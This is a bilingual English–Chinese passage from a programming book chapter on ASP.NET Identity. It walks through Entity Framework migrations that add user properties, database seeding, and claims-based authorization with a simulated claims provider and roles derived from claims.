在Configuration类中添加种植代码的原因是我需要修改IdentityDbInit类。此时,IdentityDbInit类派生于描述性命名的DropCreateDatabaseIfModelChanges<AppIdentityDbContext> 类,和你相像的一样,它会在Code First类改变时删除整个数据库。清单15-6显示了我对IdentityDbInit类所做的修改,以防止它影响数据库。 Listing 15-6. Preventing Database Schema Changes in the AppIdentityDbContext.cs File 清单15-6. 在AppIdentityDbContext.cs文件是阻止数据库架构变化 using System.Data.Entity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Models;using Microsoft.AspNet.Identity; namespace Users.Infrastructure {public class AppIdentityDbContext : IdentityDbContext<AppUser> {public AppIdentityDbContext() : base("IdentityDb") { }static AppIdentityDbContext() {Database.SetInitializer<AppIdentityDbContext>(new IdentityDbInit());}public static AppIdentityDbContext Create() {return new AppIdentityDbContext();} } public class IdentityDbInit : NullDatabaseInitializer<AppIdentityDbContext> {} } I have removed the methods defined by the class and changed its base to NullDatabaseInitializer<AppIdentityDbContext> , which prevents the schema from being altered. 我删除了这个类中所定义的方法,并将它的基类改为NullDatabaseInitializer<AppIdentityDbContext> ,它可以防止架构修改。 15.2.3 Performing the Migration 15.2.3 执行迁移 All that remains is to generate and apply the migration. First, run the following command in the Package Manager Console: 剩下的事情只是生成并运用迁移了。首先,在“Package Manager Console(包管理器控制台)”中执行以下命令: Add-Migration CityProperty This creates a new migration called CityProperty (I like my migration names to reflect the changes I made). A class new file will be added to the Migrations folder, and its name reflects the time at which the command was run and the name of the migration. My file is called 201402262244036_CityProperty.cs, for example. The contents of this file contain the details of how Entity Framework will change the database during the migration, as shown in Listing 15-7. 这创建了一个名称为CityProperty的新迁移(我比较喜欢让迁移的名称反映出我所做的修改)。这会在文件夹中添加一个新的类文件,而且其命名会反映出该命令执行的时间以及迁移名称,例如,我的这个文件名称为201402262244036_CityProperty.cs。该文件的内容含有迁移期间Entity Framework修改数据库的细节,如清单15-7所示。 Listing 15-7. The Contents of the 201402262244036_CityProperty.cs File 清单15-7. 201402262244036_CityProperty.cs文件的内容 namespace Users.Migrations {using System;using System.Data.Entity.Migrations; public partial class Init : DbMigration {public override void Up() {AddColumn("dbo.AspNetUsers", "City", c => c.Int(nullable: false));}public override void Down() {DropColumn("dbo.AspNetUsers", "City");} }} The Up method describes the changes that have to be made to the schema when the database is upgraded, which in this case means adding a City column to the AspNetUsers table, which is the one that is used to store user records in the ASP.NET Identity database. Up方法描述了在数据库升级时,需要对架构所做的修改,在这个例子中,意味着要在AspNetUsers数据表中添加City数据列,该数据表是ASP.NET Identity数据库用来存储用户记录的。 The final step is to perform the migration. Without starting the application, run the following command in the Package Manager Console: 最后一步是执行迁移。无需启动应用程序,只需在“Package Manager Console(包管理器控制台)”中运行以下命令即可: Update-Database –TargetMigration CityProperty The database schema will be modified, and the code in the Configuration.Seed method will be executed. The existing user accounts will have been preserved and enhanced with a City property (which I set to Paris in the Seed method). 这会修改数据库架构,并执行Configuration.Seed方法中的代码。已有用户账号会被保留,且增强了City属性(我在Seed方法中已将其设置为“Paris”)。 15.2.4 Testing the Migration 15.2.4 测试迁移 To test the effect of the migration, start the application, navigate to the /Home/UserProps URL, and authenticate as one of the Identity users (for example, as Alice with the password MySecret). Once authenticated, you will see the current value of the City property for the user and have the opportunity to change it, as shown in Figure 15-3. 为了测试迁移的效果,启动应用程序,导航到/Home/UserProps URL,并以Identity中的用户(例如Alice,口令MySecret)进行认证。一旦已被认证,便会看到该用户City属性的当前值,并可以对其进行修改,如图15-3所示。 Figure 15-3. Displaying and changing a custom user property 图15-3. 显示和个性自定义用户属性 15.2.5 Defining an Additional Property 15.2.5 定义附加属性 Now that database migrations are set up, I am going to define a further property just to demonstrate how subsequent changes are handled and to show a more useful (and less dangerous) example of using the Configuration.Seed method. Listing 15-8 shows how I added a Country property to the AppUser class. 现在,已经建立了数据库迁移,我打算再定义一个属性,这恰恰演示了如何处理持续不断的修改,也为了演示Configuration.Seed方法更有用(至少无害)的示例。清单15-8显示了我在AppUser类上添加了一个Country属性。 Listing 15-8. Adding Another Property in the AppUserModels.cs File 清单15-8. 在AppUserModels.cs文件中添加另一个属性 using System;using Microsoft.AspNet.Identity.EntityFramework; namespace Users.Models {public enum Cities {LONDON, PARIS, CHICAGO} public enum Countries {NONE, UK, FRANCE, USA}public class AppUser : IdentityUser {public Cities City { get; set; }public Countries Country { get; set; }public void SetCountryFromCity(Cities city) {switch (city) {case Cities.LONDON:Country = Countries.UK;break;case Cities.PARIS:Country = Countries.FRANCE;break;case Cities.CHICAGO:Country = Countries.USA;break;default:Country = Countries.NONE;break;} }} } I have added an enumeration to define the country names and a helper method that selects a country value based on the City property. Listing 15-9 shows the change I made to the Configuration class so that the Seed method sets the Country property based on the City, but only if the value of Country is NONE (which it will be for all users when the database is migrated because the Entity Framework sets enumeration columns to the first value). 我已经添加了一个枚举,它定义了国家名称。还添加了一个辅助器方法,它可以根据City属性选择一个国家。清单15-9显示了对Configuration类所做的修改,以使Seed方法根据City设置Country属性,但只当Country为NONE时才进行设置(在迁移数据库时,所有用户都是NONE,因为Entity Framework会将枚举列设置为枚举的第一个值)。 Listing 15-9. Modifying the Database Seed in the Configuration.cs File 清单15-9. 在Configuration.cs文件中修改数据库种子 using System.Data.Entity.Migrations;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Infrastructure;using Users.Models; namespace Users.Migrations {internal sealed class Configuration: DbMigrationsConfiguration<AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(AppIdentityDbContext context) {AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context)); string roleName = "Administrators";string userName = "Admin";string password = "MySecret";string email = "admin@example.com";if (!roleMgr.RoleExists(roleName)) {roleMgr.Create(new AppRole(roleName));}AppUser user = userMgr.FindByName(userName);if (user == null) {userMgr.Create(new AppUser { UserName = userName, Email = email },password);user = userMgr.FindByName(userName);}if (!userMgr.IsInRole(user.Id, roleName)) {userMgr.AddToRole(user.Id, roleName);} foreach (AppUser dbUser in userMgr.Users) {if (dbUser.Country == Countries.NONE) {dbUser.SetCountryFromCity(dbUser.City);} }context.SaveChanges();} }} This kind of seeding is more useful in a real project because it will set a value for the Country property only if one has not already been set—subsequent migrations won’t be affected, and user selections won’t be lost. 这种种植在实际项目中会更有用,因为它只会在Country属性未设置时,才会设置Country属性的值——后继的迁移不会受到影响,因此不会失去用户的选择。 1. Adding Application Support 1. 添加应用程序支持 There is no point defining additional user properties if they are not available in the application, so Listing 15-10 shows the change I made to the Views/Home/UserProps.cshtml file to display the value of the Country property. 应用程序中如果没有定义附加属性的地方,则附加属性就无法使用了,因此,清单15-10显示了我对Views/Home/UserProps.cshtml文件的修改,以显示Country属性的值。 Listing 15-10. Displaying an Additional Property in the UserProps.cshtml File 清单15-10. 在UserProps.cshtml文件中显示附加属性 @using Users.Models@model AppUser@{ ViewBag.Title = "UserProps";} <div class="panel panel-primary"><div class="panel-heading">Custom User Properties</div><table class="table table-striped"><tr><th>City</th><td>@Model.City</td></tr> <tr><th>Country</th><td>@Model.Country</td></tr></table></div>@using (Html.BeginForm()) {<div class="form-group"><label>City</label>@Html.DropDownListFor(x => x.City, new SelectList(Enum.GetNames(typeof(Cities))))</div><button class="btn btn-primary" type="submit">Save</button>} Listing 15-11 shows the corresponding change I made to the Home controller to update the Country property when the City value changes. 为了在City值变化时能够更新Country属性,清单15-11显示了我对Home控制器所做的相应修改。 Listing 15-11. Setting Custom Properties in the HomeController.cs File 清单15-11. 在HomeController.cs文件中设置自定义属性 using System.Web.Mvc;using System.Collections.Generic;using System.Web;using System.Security.Principal;using System.Threading.Tasks;using Users.Infrastructure;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Models; namespace Users.Controllers {public class HomeController : Controller {// ...other action methods omitted for brevity...// ...出于简化,这里忽略了其他动作方法... [Authorize]public ActionResult UserProps() {return View(CurrentUser);}[Authorize][HttpPost]public async Task<ActionResult> UserProps(Cities city) {AppUser user = CurrentUser;user.City = city;user.SetCountryFromCity(city);await UserManager.UpdateAsync(user);return View(user);}// ...properties omitted for brevity...// ...出于简化,这里忽略了一些属性...} } 2. Performing the Migration 2. 准备迁移 All that remains is to create and apply a new migration. Enter the following command into the Package Manager Console: 剩下的事情就是创建和运用新的迁移了。在“Package Manager Console(包管理器控制台)”中输入以下命令: Add-Migration CountryProperty This will generate another file in the Migrations folder that contains the instruction to add the Country column. To apply the migration, execute the following command: 这将在Migrations文件夹中生成另一个文件,它含有添加Country数据表列的指令。为了运用迁移,可执行以下命令: Update-Database –TargetMigration CountryProperty The migration will be performed, and the value of the Country property will be set based on the value of the existing City property for each user. You can check the new user property by starting the application and authenticating and navigating to the /Home/UserProps URL, as shown in Figure 15-4. 这将执行迁移,Country属性的值将根据每个用户当前的City属性进行设置。通过启动应用程序,认证并导航到/Home/UserProps URL,便可以查看新的用户属性,如图15-4所示。 Figure 15-4. Creating an additional user property 图15-4. 创建附加用户属性 Tip Although I am focused on the process of upgrading the database, you can also migrate back to a previous version by specifying an earlier migration. Use the –Force argument make changes that cause data loss, such as removing a column. 提示:虽然我们关注了升级数据库的过程,但你也可以回退到以前的版本,只需指定一个早期的迁移即可。使用-Force参数进行修改,会引起数据丢失,例如删除数据表列。 15.3 Working with Claims 15.3 使用声明(Claims) In older user-management systems, such as ASP.NET Membership, the application was assumed to be the authoritative source of all information about the user, essentially treating the application as a closed world and trusting the data that is contained within it. 在旧的用户管理系统中,例如ASP.NET Membership,应用程序被假设成是用户所有信息的权威来源,本质上将应用程序视为是一个封闭的世界,并且只信任其中所包含的数据。 This is such an ingrained approach to software development that it can be hard to recognize that’s what is happening, but you saw an example of the closed-world technique in Chapter 14 when I authenticated users against the credentials stored in the database and granted access based on the roles associated with those credentials. I did the same thing again in this chapter when I added properties to the user class. Every piece of information that I needed to manage user authentication and authorization came from within my application—and that is a perfectly satisfactory approach for many web applications, which is why I demonstrated these techniques in such depth. 这是软件开发的一种根深蒂固的方法,使人很难认识到这到底意味着什么,第14章你已看到了这种封闭世界技术的例子,根据存储在数据库中的凭据来认证用户,并根据与凭据关联在一起的角色来授权访问。本章前述在用户类上添加属性,也做了同样的事情。我管理用户认证与授权所需的每一个数据片段都来自于我的应用程序——而且这是许多Web应用程序都相当满意的一种方法,这也是我如此深入地演示这些技术的原因。 ASP.NET Identity also supports an alternative approach for dealing with users, which works well when the MVC framework application isn’t the sole source of information about users and which can be used to authorize users in more flexible and fluid ways than traditional roles allow. ASP.NET Identity还支持另一种处理用户的办法,当MVC框架的应用程序不是有关用户的唯一信息源时,这种办法会工作得很好,而且能够比传统的角色授权更为灵活且流畅的方式进行授权。 This alternative approach uses claims, and in this section I’ll describe how ASP.NET Identity supports claims-based authorization. Table 15-4 puts claims in context. 这种可选的办法使用了“Claims(声明)”,因此在本小节中,我将描述ASP.NET Identity如何支持“Claims-Based Authorization(基于声明的授权)”。表15-4描述了声明(Claims)的情形。 提示:“Claim”在英文字典中不完全是“声明”的意思,根据本文的描述,感觉把它说成“声明”也不一定合适,所以在之后的译文中基本都写成中英文并用的形式,即“声明(Claims)”。根据表15-4中的声明(Claims)的定义:声明(Claims)是关于用户的一些信息片段。一个用户的信息片段当然有很多,每一个信息片段就是一项声明(Claim),用户的所有信息片段合起来就是该用户的声明(Claims)。请读者注意该单词的单复数形式——译者注 Table 15-4. Putting Claims in Context 表15-4. 声明(Claims)的情形 Question 问题 Answer 答案 What is it? 什么是声明(Claims)? Claims are pieces of information about users that you can use to make authorization decisions. Claims can be obtained from external systems as well as from the local Identity database. 声明(Claims)是关于用户的一些信息片段,可以用它们做出授权决定。声明(Claims)可以从外部系统获取,也可以从本地的Identity数据库获取。 Why should I care? 为何要关心它? Claims can be used to flexibly authorize access to action methods. Unlike conventional roles, claims allow access to be driven by the information that describes the user. 声明(Claims)可以用来对动作方法进行灵活的授权访问。与传统的角色不同,声明(Claims)让访问能够由描述用户的信息进行驱动。 How is it used by the MVC framework? 如何在MVC框架中使用它? This feature isn’t used directly by the MVC framework, but it is integrated into the standard authorization features, such as the Authorize attribute. 这不是直接由MVC框架使用的特性,但它集成到了标准的授权特性之中,例如Authorize注解属性。 Tip you don’t have to use claims in your applications, and as Chapter 14 showed, ASP.NET Identity is perfectly happy providing an application with the authentication and authorization services without any need to understand claims at all. 提示:你在应用程序中不一定要使用声明(Claims),正如第14章所展示的那样,ASP.NET Identity能够为应用程序提供充分的认证与授权服务,而根本不需要理解声明(Claims)。 15.3.1 Understanding Claims 15.3.1 理解声明(Claims) A claim is a piece of information about the user, along with some information about where the information came from. The easiest way to unpack claims is through some practical demonstrations, without which any discussion becomes too abstract to be truly useful. To get started, I added a Claims controller to the example project, the definition of which you can see in Listing 15-12. 一项声明(Claim)是关于用户的一个信息片段(请注意这个英文单词的单复数形式——译者注),并伴有该片段出自何处的某种信息。揭开声明(Claims)含义最容易的方式是做一些实际演示,任何讨论都会过于抽象根本没有真正的用处。为此,我在示例项目中添加了一个Claims控制器,其定义如清单15-12所示。 Listing 15-12. The Contents of the ClaimsController.cs File 清单15-12. ClaimsController.cs文件的内容 using System.Security.Claims;using System.Web;using System.Web.Mvc; namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} }} } Tip You may feel a little lost as I define the code for this example. Don’t worry about the details for the moment—just stick with it until you see the output from the action method and view that I define. More than anything else, that will help put claims into perspective. 提示:你或许会对我为此例定义的代码感到有点失望。此刻对此细节不必着急——只要稍事忍耐,当看到该动作方法和视图的输出便会明白。尤为重要的是,这有助于洞察声明(Claims)。 You can get the claims associated with a user in different ways. One approach is to use the Claims property defined by the user class, but in this example, I have used the HttpContext.User.Identity property to demonstrate the way that ASP.NET Identity is integrated with the rest of the ASP.NET platform. As I explained in Chapter 13, the HttpContext.User.Identity property returns an implementation of the IIdentity interface, which is a ClaimsIdentity object when working using ASP.NET Identity. The ClaimsIdentity class is defined in the System.Security.Claims namespace, and Table 15-5 shows the members it defines that are relevant to this chapter. 可以通过不同的方式获得与用户相关联的声明(Claims)。方法之一就是使用由用户类定义的Claims属性,但在这个例子中,我使用了HttpContext.User.Identity属性,目的是演示ASP.NET Identity与ASP.NET平台集成的方式(请注意这句话所表示的含义:用户类的Claims属性属于ASP.NET Identity,而HttpContext.User.Identity属性则属于ASP.NET平台。由此可见,ASP.NET Identity已经融合到了ASP.NET平台之中——译者注)。正如第13章所解释的那样,HttpContext.User.Identity属性返回IIdentity的接口实现,当使用ASP.NET Identity时,该实现是一个ClaimsIdentity对象。ClaimsIdentity类是在System.Security.Claims命名空间中定义的,表15-5显示了它所定义的与本章有关的成员。 Table 15-5. The Members Defined by the ClaimsIdentity Class 表15-5. ClaimsIdentity类所定义的成员 Name 名称 Description 描述 Claims Returns an enumeration of Claim objects representing the claims for the user. 返回表示用户声明(Claims)的Claim对象枚举 AddClaim(claim) Adds a claim to the user identity. 给用户添加一个声明(Claim) AddClaims(claims) Adds an enumeration of Claim objects to the user identity. 给用户添加Claim对象的枚举。 HasClaim(predicate) Returns true if the user identity contains a claim that matches the specified predicate. See the “Applying Claims” section for an example predicate. 如果用户含有与指定谓词匹配的声明(Claim)时,返回true。参见“运用声明(Claims)”中的示例谓词 RemoveClaim(claim) Removes a claim from the user identity. 删除用户的声明(Claim)。 Other members are available, but the ones in the table are those that are used most often in web applications, for reason that will become obvious as I demonstrate how claims fit into the wider ASP.NET platform. 还有一些可用的其它成员,但表中的这些是在Web应用程序中最常用的,随着我演示如何将声明(Claims)融入更宽泛的ASP.NET平台,它们为什么最常用就很显然了。 In Listing 15-12, I cast the IIdentity implementation to the ClaimsIdentity type and pass the enumeration of Claim objects returned by the ClaimsIdentity.Claims property to the View method. A Claim object represents a single piece of data about the user, and the Claim class defines the properties shown in Table 15-6. 在清单15-12中,我将IIdentity实现转换成了ClaimsIdentity类型,并且给View方法传递了ClaimsIdentity.Claims属性所返回的Claim对象的枚举。Claim对象所示表示的是关于用户的一个单一的数据片段,Claim类定义的属性如表15-6所示。 Table 15-6. The Properties Defined by the Claim Class 表15-6. Claim类定义的属性 Name 名称 Description 描述 Issuer Returns the name of the system that provided the claim 返回提供声明(Claim)的系统名称 Subject Returns the ClaimsIdentity object for the user who the claim refers to 返回声明(Claim)所指用户的ClaimsIdentity对象 Type Returns the type of information that the claim represents 返回声明(Claim)所表示的信息类型 Value Returns the piece of information that the claim represents 返回声明(Claim)所表示的信息片段 Listing 15-13 shows the contents of the Index.cshtml file that I created in the Views/Claims folder and that is rendered by the Index action of the Claims controller. The view adds a row to a table for each claim about the user. 清单15-13显示了我在Views/Claims文件夹中创建的Index.cshtml文件的内容,它由Claims控制器中的Index动作方法进行渲染。该视图为用户的每项声明(Claim)添加了一个表格行。 Listing 15-13. The Contents of the Index.cshtml File in the Views/Claims Folder 清单15-13. Views/Claims文件夹中Index.cshtml文件的内容 @using System.Security.Claims@using Users.Infrastructure@model IEnumerable<Claim>@{ ViewBag.Title = "Claims"; }<div class="panel panel-primary"><div class="panel-heading">Claims</div><table class="table table-striped"><tr><th>Subject</th><th>Issuer</th><th>Type</th><th>Value</th></tr>@foreach (Claim claim in Model.OrderBy(x => x.Type)) {<tr><td>@claim.Subject.Name</td><td>@claim.Issuer</td><td>@Html.ClaimType(claim.Type)</td><td>@claim.Value</td></tr>}</table></div> The value of the Claim.Type property is a URI for a Microsoft schema, which isn’t especially useful. The popular schemas are used as the values for fields in the System.Security.Claims.ClaimTypes class, so to make the output from the Index.cshtml view easier to read, I added an HTML helper to the IdentityHelpers.cs file, as shown in Listing 15-14. It is this helper that I use in the Index.cshtml file to format the value of the Claim.Type property. Claim.Type属性的值是一个微软模式(Microsoft Schema)的URI(统一资源标识符),这是特别有用的。System.Security.Claims.ClaimTypes类中字段的值使用的是流行模式(Popular Schema),因此为了使Index.cshtml视图的输出更易于阅读,我在IdentityHelpers.cs文件中添加了一个HTML辅助器,如清单15-14所示。Index.cshtml文件正是使用这个辅助器格式化了Claim.Type属性的值。 Listing 15-14. Adding a Helper to the IdentityHelpers.cs File 清单15-14. 在IdentityHelpers.cs文件中添加辅助器 using System.Web;using System.Web.Mvc;using Microsoft.AspNet.Identity.Owin;using System;using System.Linq;using System.Reflection;using System.Security.Claims;namespace Users.Infrastructure {public static class IdentityHelpers {public static MvcHtmlString GetUserName(this HtmlHelper html, string id) {AppUserManager mgr= HttpContext.Current.GetOwinContext().GetUserManager<AppUserManager>();return new MvcHtmlString(mgr.FindByIdAsync(id).Result.UserName);} public static MvcHtmlString ClaimType(this HtmlHelper html, string claimType) {FieldInfo[] fields = typeof(ClaimTypes).GetFields();foreach (FieldInfo field in fields) {if (field.GetValue(null).ToString() == claimType) {return new MvcHtmlString(field.Name);} }return new MvcHtmlString(string.Format("{0}",claimType.Split('/', '.').Last()));} }} Note The helper method isn’t at all efficient because it reflects on the fields of the ClaimType class for each claim that is displayed, but it is sufficient for my purposes in this chapter. You won’t often need to display the claim type in real applications. 注:该辅助器并非十分有效,因为它只是针对每个要显示的声明(Claim)映射出ClaimType类的字段,但对我要的目的已经足够了。在实际项目中不会经常需要显示声明(Claim)的类型。 To see why I have created a controller that uses claims without really explaining what they are, start the application, authenticate as the user Alice (with the password MySecret), and request the /Claims/Index URL. Figure 15-5 shows the content that is generated. 为了弄明白我为何要先创建一个使用声明(Claims)的控制器,而没有真正解释声明(Claims)是什么的原因,可以启动应用程序,以用户Alice进行认证(其口令是MySecret),并请求/Claims/Index URL。图15-5显示了生成的内容。 Figure 15-5. The output from the Index action of the Claims controller 图15-5. Claims控制器中Index动作的输出 It can be hard to make out the detail in the figure, so I have reproduced the content in Table 15-7. 这可能还难以认识到此图的细节,为此我在表15-7中重列了其内容。 Table 15-7. The Data Shown in Figure 15-5 表15-7. 图15-5中显示的数据 Subject(科目) Issuer(发行者) Type(类型) Value(值) Alice LOCAL AUTHORITY SecurityStamp Unique ID Alice LOCAL AUTHORITY IdentityProvider ASP.NET Identity Alice LOCAL AUTHORITY Role Employees Alice LOCAL AUTHORITY Role Users Alice LOCAL AUTHORITY Name Alice Alice LOCAL AUTHORITY NameIdentifier Alice’s user ID The table shows the most important aspect of claims, which is that I have already been using them when I implemented the traditional authentication and authorization features in Chapter 14. You can see that some of the claims relate to user identity (the Name claim is Alice, and the NameIdentifier claim is Alice’s unique user ID in my ASP.NET Identity database). 此表展示了声明(Claims)最重要的方面,这些是我在第14章中实现传统的认证和授权特性时,一直在使用的信息。可以看出,有些声明(Claims)与用户标识有关(Name声明是Alice,NameIdentifier声明是Alice在ASP.NET Identity数据库中的唯一用户ID号)。 Other claims show membership of roles—there are two Role claims in the table, reflecting the fact that Alice is assigned to both the Users and Employees roles. There is also a claim about how Alice has been authenticated: The IdentityProvider is set to ASP.NET Identity. 其他声明(Claims)显示了角色成员——表中有两个Role声明(Claim),体现出Alice被赋予了Users和Employees两个角色这一事实。还有一个是Alice已被认证的声明(Claim):IdentityProvider被设置到了ASP.NET Identity。 The difference when this information is expressed as a set of claims is that you can determine where the data came from. The Issuer property for all the claims shown in the table is set to LOCAL AUTHORITY, which indicates that the user’s identity has been established by the application. 当这种信息被表示成一组声明(Claims)时的差别是,你能够确定这些数据是从哪里来的。表中所显示的所有声明的Issuer属性(发布者)都被设置到了LOACL AUTHORITY(本地授权),这说明该用户的标识是由应用程序建立的。 So, now that you have seen some example claims, I can more easily describe what a claim is. A claim is any piece of information about a user that is available to the application, including the user’s identity and role memberships. And, as you have seen, the information I have been defining about my users in earlier chapters is automatically made available as claims by ASP.NET Identity. 因此,现在你已经看到了一些声明(Claims)示例,我可以更容易地描述声明(Claim)是什么了。一项声明(Claim)是可用于应用程序中的有关用户的一个信息片段,包括用户的标识以及角色成员等。而且,正如你所看到的,我在前几章定义的关于用户的信息,被ASP.NET Identity自动地作为声明(Claims)了。 15.3.2 Creating and Using Claims 15.3.2 创建和使用声明(Claims) Claims are interesting for two reasons. The first reason is that an application can obtain claims from multiple sources, rather than just relying on a local database for information about the user. You will see a real example of this when I show you how to authenticate users through a third-party system in the “Using Third-Party Authentication” section, but for the moment I am going to add a class to the example project that simulates a system that provides claims information. Listing 15-15 shows the contents of the LocationClaimsProvider.cs file that I added to the Infrastructure folder. 声明(Claims)比较有意思的原因有两个。第一个原因是应用程序可以从多个来源获取声明(Claims),而不是只能依靠本地数据库关于用户的信息。你将会看到一个实际的示例,在“使用第三方认证”小节中,将演示如何通过第三方系统来认证用户。不过,此刻我只打算在示例项目中添加一个类,用以模拟一个提供声明(Claims)信息的系统。清单15-15显示了我添加到Infrastructure文件夹中LocationClaimsProvider.cs文件的内容。 Listing 15-15. The Contents of the LocationClaimsProvider.cs File 清单15-15. LocationClaimsProvider.cs文件的内容 using System.Collections.Generic;using System.Security.Claims; namespace Users.Infrastructure {public static class LocationClaimsProvider {public static IEnumerable<Claim> GetClaims(ClaimsIdentity user) {List<Claim> claims = new List<Claim>();if (user.Name.ToLower() == "alice") {claims.Add(CreateClaim(ClaimTypes.PostalCode, "DC 20500"));claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "DC"));} else {claims.Add(CreateClaim(ClaimTypes.PostalCode, "NY 10036"));claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "NY"));}return claims;}private static Claim CreateClaim(string type, string value) {return new Claim(type, value, ClaimValueTypes.String, "RemoteClaims");} }} The GetClaims method takes a ClaimsIdentity argument and uses the Name property to create claims about the user’s ZIP code and state. This class allows me to simulate a system such as a central HR database, which would be the authoritative source of location information about staff, for example. GetClaims方法以ClaimsIdentity为参数,并使用Name属性创建了关于用户ZIP码(邮政编码)和州府的声明(Claims)。上述这个类使我能够模拟一个诸如中心化的HR数据库(人力资源数据库)之类的系统,它可能会成为全体职员的地点信息的权威数据源。 Claims are associated with the user’s identity during the authentication process, and Listing 15-16 shows the changes I made to the Login action method of the Account controller to call the LocationClaimsProvider class. 在认证过程期间,声明(Claims)是与用户标识关联在一起的,清单15-16显示了我对Account控制器中Login动作方法所做的修改,以便调用LocationClaimsProvider类。 Listing 15-16. Associating Claims with a User in the AccountController.cs File 清单15-16. AccountController.cs文件中用户用声明的关联 ...[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie); ident.AddClaims(LocationClaimsProvider.GetClaims(ident));AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);}... You can see the effect of the location claims by starting the application, authenticating as a user, and requesting the /Claim/Index URL. Figure 15-6 shows the claims for Alice. You may have to sign out and sign back in again to see the change. 为了看看这个地点声明(Claims)的效果,可以启动应用程序,以一个用户进行认证,并请求/Claim/Index URL。图15-6显示了Alice的声明(Claims)。你可能需要退出,然后再次登录才会看到发生的变化。 Figure 15-6. Defining additional claims for users 图15-6. 定义用户的附加声明 Obtaining claims from multiple locations means that the application doesn’t have to duplicate data that is held elsewhere and allows integration of data from external parties. The Claim.Issuer property tells you where a claim originated from, which helps you judge how accurate the data is likely to be and how much weight you should give the data in your application. Location data obtained from a central HR database is likely to be more accurate and trustworthy than data obtained from an external mailing list provider, for example. 从多个地点获取声明(Claims)意味着应用程序不必复制其他地方保持的数据,并且能够与外部的数据集成。Claim.Issuer属性(图15-6中的Issuer数据列——译者注)能够告诉你一个声明(Claim)的发源地,这有助于让你判断数据的精确程度,也有助于让你决定这类数据在应用程序中的权重。例如,从中心化的HR数据库获取的地点数据可能要比外部邮件列表提供器获取的数据更为精确和可信。 1. Applying Claims 1. 运用声明(Claims) The second reason that claims are interesting is that you can use them to manage user access to your application more flexibly than with standard roles. The problem with roles is that they are static, and once a user has been assigned to a role, the user remains a member until explicitly removed. This is, for example, how long-term employees of big corporations end up with incredible access to internal systems: They are assigned the roles they require for each new job they get, but the old roles are rarely removed. (The unexpectedly broad systems access sometimes becomes apparent during the investigation into how someone was able to ship the contents of the warehouse to their home address—true story.) 声明(Claims)有意思的第二个原因是,你可以用它们来管理用户对应用程序的访问,这要比标准的角色管理更为灵活。角色的问题在于它们是静态的,而且一旦用户已经被赋予了一个角色,该用户便是一个成员,直到明确地删除为止。例如,这意味着大公司的长期雇员,对内部系统的访问会十分惊人:他们每次在获得新工作时,都会赋予所需的角色,但旧角色很少被删除。(在调查某人为何能够将仓库里的东西发往他的家庭地址过程中发现,有时会出现异常宽泛的系统访问——真实的故事) Claims can be used to authorize users based directly on the information that is known about them, which ensures that the authorization changes when the data changes. The simplest way to do this is to generate Role claims based on user data that are then used by controllers to restrict access to action methods. Listing 15-17 shows the contents of the ClaimsRoles.cs file that I added to the Infrastructure. 声明(Claims)可以直接根据用户已知的信息对用户进行授权,这能够保证当数据发生变化时,授权也随之而变。此事最简单的做法是根据用户数据来生成Role声明(Claim),然后由控制器用来限制对动作方法的访问。清单15-17显示了我添加到Infrastructure中的ClaimsRoles.cs文件的内容。 Listing 15-17. The Contents of the ClaimsRoles.cs File 清单15-17. ClaimsRoles.cs文件的内容 using System.Collections.Generic;using System.Security.Claims; namespace Users.Infrastructure {public class ClaimsRoles {public static IEnumerable<Claim> CreateRolesFromClaims(ClaimsIdentity user) {List<Claim> claims = new List<Claim>();if (user.HasClaim(x => x.Type == ClaimTypes.StateOrProvince&& x.Issuer == "RemoteClaims" && x.Value == "DC")&& user.HasClaim(x => x.Type == ClaimTypes.Role&& x.Value == "Employees")) {claims.Add(new Claim(ClaimTypes.Role, "DCStaff"));}return claims;} }} The gnarly looking CreateRolesFromClaims method uses lambda expressions to determine whether the user has a StateOrProvince claim from the RemoteClaims issuer with a value of DC and a Role claim with a value of Employees. If the user has both claims, then a Role claim is returned for the DCStaff role. Listing 15-18 shows how I call the CreateRolesFromClaims method from the Login action in the Account controller. CreateRolesFromClaims是一个粗糙的考察方法,它使用了Lambda表达式,以检查用户是否具有StateOrProvince声明(Claim),该声明来自于RemoteClaims发行者(Issuer),值为DC。也检查用户是否具有Role声明(Claim),其值为Employees。如果用户这两个声明都有,那么便返回一个DCStaff角色的Role声明。清单15-18显示了如何在Account控制器中的Login动作中调用CreateRolesFromClaims方法。 Listing 15-18. Generating Roles Based on Claims in the AccountController.cs File 清单15-18. 在AccountController.cs中根据声明生成角色 ...[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(LocationClaimsProvider.GetClaims(ident)); ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident));AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);}... I can then restrict access to an action method based on membership of the DCStaff role. Listing 15-19 shows a new action method I added to the Claims controller to which I have applied the Authorize attribute. 然后我可以根据DCStaff角色的成员,来限制对一个动作方法的访问。清单15-19显示了在Claims控制器中添加的一个新的动作方法,在该方法上已经运用了Authorize注解属性。 